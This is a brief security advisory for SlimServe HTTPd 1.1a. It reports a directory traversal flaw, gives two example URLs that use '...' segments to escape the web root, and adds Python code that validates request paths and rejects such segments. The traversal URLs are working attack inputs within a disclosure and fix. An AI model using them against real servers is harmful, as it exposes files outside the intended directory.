
SlimServe HTTPd ver. 1.1a break out of www root



Vulnerability

    SlimServe HTTPd

Affected

    SlimServe HTTPd ver. 1.1a

Description

    'se00020' posted the following.  It is possible to view directories
    and download files outside of the wwwroot directory.  Exploit:

        http://127.0.0.1/.../
        http://127.0.0.1/.../.../directory/file.xxx

Solution

    Disable folder listings (they are enabled by default).  This
    prevents viewing directories outside of the wwwroot directory, but
    it is still possible to download or view files when their location
    is known.
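
Because disabling listings leaves known files reachable, the durable fix is in how the server maps a request path to a file. The sketch below is an added example, not SlimServe's code and not part of the original advisory: it refuses any path segment made only of dots (which covers the "..." pattern above) and then confirms the resolved path is still under the root. The names resolve_request_path, is_served and PathRejected are hypothetical.

```python
import os
from urllib.parse import unquote, urlsplit


class PathRejected(Exception):
    """The request path must not be served."""


def resolve_request_path(wwwroot, url):
    """Map a request URL to a file path under wwwroot or raise PathRejected."""
    root = os.path.realpath(wwwroot)
    # Decode percent-escapes first so "%2e%2e%2e" is checked like "...".
    raw = unquote(urlsplit(url).path)
    if "\x00" in raw:
        raise PathRejected("NUL byte in path")
    segments = []
    # Backslash is treated as a separator as well, as Windows file APIs do.
    for seg in raw.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        # Refuse every dot-only segment ("..", "...", "...."), not just "..":
        # what such a name resolves to is up to the OS, so never pass it on.
        if seg.strip(".") == "":
            raise PathRejected("dot-only segment %r" % seg)
        if ":" in seg:
            raise PathRejected("drive or stream specifier %r" % seg)
        segments.append(seg)
    candidate = os.path.realpath(os.path.join(root, *segments))
    # Second line of defence: the resolved path must still be inside the root
    # (this also catches symlinks that point elsewhere).
    if os.path.commonpath([root, candidate]) != root:
        raise PathRejected("resolves outside wwwroot")
    return candidate


def is_served(wwwroot, url):
    """True if the URL maps inside wwwroot, False if it is rejected."""
    try:
        resolve_request_path(wwwroot, url)
        return True
    except PathRejected:
        return False


if __name__ == "__main__":
    # Constructed sample requests; the first two are the advisory's patterns.
    for u in ("http://127.0.0.1/.../",
              "http://127.0.0.1/.../.../directory/file.xxx",
              "http://127.0.0.1/docs/index.html"):
        print(u, "->", "served" if is_served("wwwroot", u) else "rejected")
```

The same check applies whether or not folder listings are enabled, since it runs before any file or directory is opened.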

